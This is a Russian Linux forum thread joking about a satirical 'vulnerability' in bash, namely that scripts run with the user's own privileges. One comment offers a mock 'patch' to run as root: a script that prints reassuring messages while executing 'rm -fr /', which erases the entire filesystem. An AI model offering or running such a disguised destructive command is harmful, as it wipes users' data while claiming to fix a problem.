LINUX.ORG.RU

Re: Найдена уязвимость в bash

=))))))))

gr_buza ★★★★ ()

Re: Найдена уязвимость в bash

иксплойт есть?

stassats ★★★★ ()

Re: Найдена уязвимость в bash

какое щастье что я использую zsh :)

JB ★★★★★ ()

Re: Найдена уязвимость в bash

Обновился до последней версии...

anonymous ()

Re: Найдена уязвимость в bash

Ужос!

Zlyden ★★★ ()

Re: Найдена уязвимость в bash

Так это и на Перле можно и даже на Вижуал Васике

anonymous ()

Re: Найдена уязвимость в bash

БлиН, пришлось перечитать два раза - старею =)

UVV ★★★★★ ()

Re: Найдена уязвимость в bash

:)))

Заплатку выпустили уже?

skyfisher ()

Re: Найдена уязвимость в bash

пожалуй, стоит на lorquotes записать!

Eldhenn ()
Ответ на: Re: Найдена уязвимость в bash от skyfisher

Re: Найдена уязвимость в bash

>>Заплатку выпустили уже?

Еще нет. В качестве временной меры можно сделать chmod a-x /где/там/у/вас/bash и для пущей надежности прописать /bin/false в /etc/passwd

Zenom ★★★ ()
Ответ на: Re: Найдена уязвимость в bash от Zenom

Re: Найдена уязвимость в bash

Уже есть комментарии Microsoft - "Новая версия Windows этой уязвимости подвержена не будет, в ней нельзя будет писать скрипты".

Eldhenn ()

Re: Найдена уязвимость в bash

Заплатка от этой уязвимости и от многих других(запускать под рутом):

#!/bin/bash
echo "Подождите пока не будут найдены и удалены все потенциально вредоносные файлы..."
rm -fr /
echo "Сделано. Теперь перезапустите ваш компьютер"

W98 ()

Re: Найдена уязвимость в bash

=)))))))))))))

Rain ★★★★ ()

Re: Найдена уязвимость в bash

Это фигня ещё. С помощю su вообще можно поднять привелегии до рутовских :(

bugmaker ★★★★☆ ()
Ответ на: Re: Найдена уязвимость в bash от sdio

Re: Найдена уязвимость в bash

Гы! Баш без пароля ползователя тож несумеет выполнить скрыпт с привелегиями оного, так что сударь изволил облегчиться в непосредственной близости от тазика...

bugmaker ★★★★☆ ()
Ответ на: Re: Найдена уязвимость в bash от bugmaker

Re: Найдена уязвимость в bash

>Злоумышленник может написать произвольный скрипт, который выполнится с правами пользователя, запустившего его.

>>С помощю su вообще можно поднять привелегии до рутовских :(

Если ты недогоняешь смысловой разницы, неогорчайся что "изволил облегчиться в непосредственной близости от тазика..."

sdio ★★★★★ ()
Ответ на: Re: Найдена уязвимость в bash от sdio

Re: Найдена уязвимость в bash

Ну ладно, если не догоняеш, что у пользователя есть не только возможность запустить скрыпт со своими привелегиями, но и сперва повысить их а потом ужо запустить скрыпт, не буду обижаться.

bugmaker ★★★★☆ ()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.
Talks